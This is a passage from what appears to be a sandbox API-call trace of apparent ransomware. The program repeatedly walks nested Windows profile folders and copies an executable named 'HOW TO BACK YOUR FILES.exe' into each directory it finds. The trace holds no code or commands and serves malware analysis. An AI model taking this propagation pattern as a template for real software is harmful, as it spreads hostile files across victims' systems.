lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.656] CloseHandle (hObject=0x118) returned 1 [0042.656] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.656] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.656] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.656] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0042.656] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.656] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.657] GetLastError () returned 0x0 [0042.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.657] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.657] CloseHandle (hObject=0x118) returned 1 [0042.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.657] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.657] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0042.657] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.657] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.658] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.658] GetLastError () returned 0x0 [0042.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.658] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.658] CloseHandle (hObject=0x118) returned 1 [0042.658] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.658] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.659] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.659] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.659] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.659] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.659] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.659] GetLastError () returned 0x0 [0042.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.659] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.659] CloseHandle (hObject=0x118) returned 1 [0042.660] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.660] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.660] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.660] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.661] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.661] GetLastError () returned 0x0 [0042.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.661] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.661] CloseHandle (hObject=0x118) returned 1 [0042.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.661] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.661] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.661] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.661] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.662] GetLastError () returned 0x0 [0042.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.662] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.662] CloseHandle (hObject=0x118) returned 1 [0042.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.662] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.663] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.663] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0042.663] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.663] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.663] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.663] GetLastError () returned 0x0 [0042.663] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.663] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.663] CloseHandle (hObject=0x118) returned 1 [0042.664] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.664] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.664] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.664] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0042.664] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.664] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.664] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.665] GetLastError () returned 0x0 [0042.665] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.665] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.665] CloseHandle (hObject=0x118) returned 1 [0042.665] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.665] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.665] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.665] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.665] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.666] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.666] GetLastError () returned 0x0 [0042.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.666] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.666] CloseHandle (hObject=0x118) returned 1 [0042.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.666] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.666] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.666] lstrcatW (in: lpString1="", 